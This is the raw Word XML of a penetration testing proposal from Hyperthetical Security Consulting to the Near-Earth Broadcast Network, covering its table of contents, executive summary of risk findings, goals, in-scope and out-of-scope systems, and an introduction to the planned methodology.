                <w:noProof/>
              </w:rPr>
              <w:t>External Network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3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1DB0D014" w14:textId="2236E5D8" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370244" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>External Web Application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4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232B419F" w14:textId="6C353915" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370245" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Internal Network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4D8126A2" w14:textId="195C1DB0" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370246" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules of Engagemen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6EB405B1" w14:textId="51F38AA7" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370247" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Methodolog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7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6</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B4B4646" w14:textId="3635991E" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370248" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Deliverabl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8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6</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61D39F5A" w14:textId="4C56BFEB" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370249" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Roles and Responsibiliti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9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E953B2E" w14:textId="1AF9443D" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370250" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hyperthetical Consulting</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0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E0C1461" w14:textId="239A9EDA" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370251" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Near-Earth Broadcast Network</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1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076775A" w14:textId="34D27E73" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370252" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A: Glossary and Definition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2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8</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BCD6E51" w14:textId="4C30A874" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370253" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix B: Tool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3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730E0339" w14:textId="079C0C53" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370254" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reconnaissanc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4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7B9E994A" w14:textId="52EB145B" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370255" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability Discover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0E6BA831" w14:textId="79EF5642" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370256" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation and Escalation</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6978DAFB" w14:textId="53202077" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="084E113C" w14:textId="00130FE9" w:rsidR="00B00365" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A4F2D" w14:textId="2EB53A75" w:rsidR="00E03870" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc129370235"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="49BDB21D" w14:textId="77777777" w:rsidR="00707178" w:rsidRPr="00707178" w:rsidRDefault="00707178" w:rsidP="00707178">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707178">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The proposed penetration test offers a thorough and all-encompassing approach to assess the security of the Near-Earth Broadcast Network ("NBN") IT infrastructure. Hyperthetical Security Consulting ("Hyperthetical"), with their extensive experience and expertise, will conduct a comprehensive penetration test to identify vulnerabilities and potential security risks, recommend remediation measures, and suggest software solutions best suited for NBN's needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7990734A" w14:textId="50857DF8" w:rsidR="00317DD7" w:rsidRPr="00707178" w:rsidRDefault="00707178" w:rsidP="00707178">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707178">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The Hyperthetical team will assess NBN's ability to defend against direct and indirect attacks by</w:t>
      </w:r>
      <w:r w:rsidR="003719FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> enumerating and then</w:t>
      </w:r>
      <w:r w:rsidRPr="00707178">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> performing attacks against external facing hosts and services, external web apps, and the internal network while avoiding disrupting NBN's daily operations. This penetration test proposal provides an exceptional opportunity for NBN to assess its security posture comprehensively and obtain actionable insights into improving its IT infrastructure's security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3113898D" w14:textId="2DC0A443" w:rsidR="00B47DC6" w:rsidRDefault="00B47DC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc129370237"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment team </w:t>
      </w:r>
      <w:r w:rsidR="00E73F01">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>found the NBN network to be at a critical level of risk. They observed issues with user input being used unsafely, leading to injection and code execution issues. They also observed many areas that were missing appropriate access controls.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA0938F" w14:textId="58F7AF79" w:rsidR="00E03870" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Goals and Objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3B01A85A" w14:textId="0C0D48C1" w:rsidR="00E03870" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The goal of this penetration test is to evaluate NBN's cybersecurity risk for outside threats and recommend actions to minimize this risk. Specifically, our objectives are to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A45CD0"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Identify potential vulnerabilities and weaknesses in the IT infrastructure, web applications, and APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189626B"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Test the effectiveness of existing security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9167F4"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Provide recommendations for improving the security posture of NBN's IT infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62472E4E"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Produce a comprehensive report that outlines all findings, recommendations, and best practices for remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB1F1A0" w14:textId="77777777" w:rsidR="00E03870" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc129370238"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Scope Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="49024C35" w14:textId="77777777" w:rsidR="00E03870" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc129370239"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3BCC2D65"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NBN public web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0E3A4"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Externally facing hosts and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F2E456"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Internally facing hosts and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5234EAC8" w14:textId="77777777" w:rsidR="00E03870" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc129370240"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Out of Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="450CB553" w14:textId="77777777" w:rsidR="00E03870" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>NBN Employee VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE0D41" w14:textId="77777777" w:rsidR="00E03870" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E03870">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>NBN Office Spaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE2A4FF" w14:textId="1D07CF3A" w:rsidR="007E1592" w:rsidRPr="000C7432" w:rsidRDefault="00000000" w:rsidP="000C7432">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Existing NBN subscriber (“Sub”) and business partner (“BP”) accounts</w:t>
      </w:r>
      <w:r w:rsidR="000C7432">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7432">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CE74A" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="005264D0" w:rsidRDefault="004F68CB" w:rsidP="00317DD7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc129370236"/>
      <w:bookmarkStart w:id="6" w:name="_Toc129370241"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4BF1DF52" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="005264D0" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This Penetration Testing Proposal aims to provide a comprehensive approach to performing a penetration test against the Near-Earth Broadcast Network (“NBN”) IT infrastructure. This proposal outlines the scope, methodology, and deliverables for the proposed penetration test (“pentest”). Using our methods, the pentest team will identify vulnerabilities and potential security risks, provide recommended remediation, and suggest best practices for software solutions. The Hyperthetical Security Consulting (“Hyperthetical”) team has the necessary experience and expertise to perform a comprehensive and detailed pen test of NBN's IT infrastructure, identify vulnerabilities and recommend remediation measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19112AAD" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="005264D0" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To test NBN's ability to defend against direct and indirect attacks, the Hyperthetical team will perform a comprehensive penetration test of NBN's external facing hosts and services, external web apps, and internal network. The team will begin the assessment from outside of the network and perform discovery and enumeration of the NBN external network. After verifying the discovered scope with the NBN security team, they will move on to vulnerability discovery and exploitation against the NBN external network and web applications. If the assessment team gains access to the NBN internal network, they will continue the assessment to find more vulnerabilities in the internal network. The team will perform testing with a focus on identifying medium to critical severity security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354E8A0" w14:textId="67CA1461" w:rsidR="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The Hyperthetical team will conduct the Penetration Test to avoid disrupting NBN's day-to-day operations. The assessment team will not perform Denial of Service (DoS) testing and will provide NBN with a schedule of events outlining the planned testing activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BEFA61" w14:textId="1411A0DD" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Methods and Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3B9D74F6" w14:textId="1888DC8C" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc129370242"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Detailed Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="47920FF1" w14:textId="7B3BAE5F" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>All testing will be conducted within a stringently adhered-to scope. All findings and analyses are limited to this scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03EA83" w14:textId="525FBBF1" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc129370243"/>
